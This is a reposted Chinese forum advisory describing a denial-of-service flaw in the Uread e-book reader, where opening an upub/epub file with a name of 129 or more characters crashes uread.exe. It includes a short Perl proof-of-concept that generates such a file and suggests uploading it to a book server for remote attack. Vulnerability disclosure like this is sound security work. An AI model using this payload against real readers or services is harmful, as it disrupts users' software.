• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Uread阅读器拒绝服务漏洞的分析与解决

    发布者: 浪子 | 发布时间: 2025-6-28 23:23| 查看数: 112| 评论数: 0|帖子模式

    Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
    远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
    测试证明
    -----------------------------------------------------------
    #!/usr/bin/perl -w
    $filename="a"x129;
    print "------Generate testfile \"a\"x129.epub------\n";
    open(TESTFILE, ">$filename.epub");
    sleep(3);
    close(TESTFILE);
    print "------Complete!------\n";
    exit(1);
    -----------------------------------------------------------
    修复方案:
    目前厂商还没有提供补丁或者升级程序。
    作者 demonalex

    来源:https://www.jb51.net/hack/56752.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表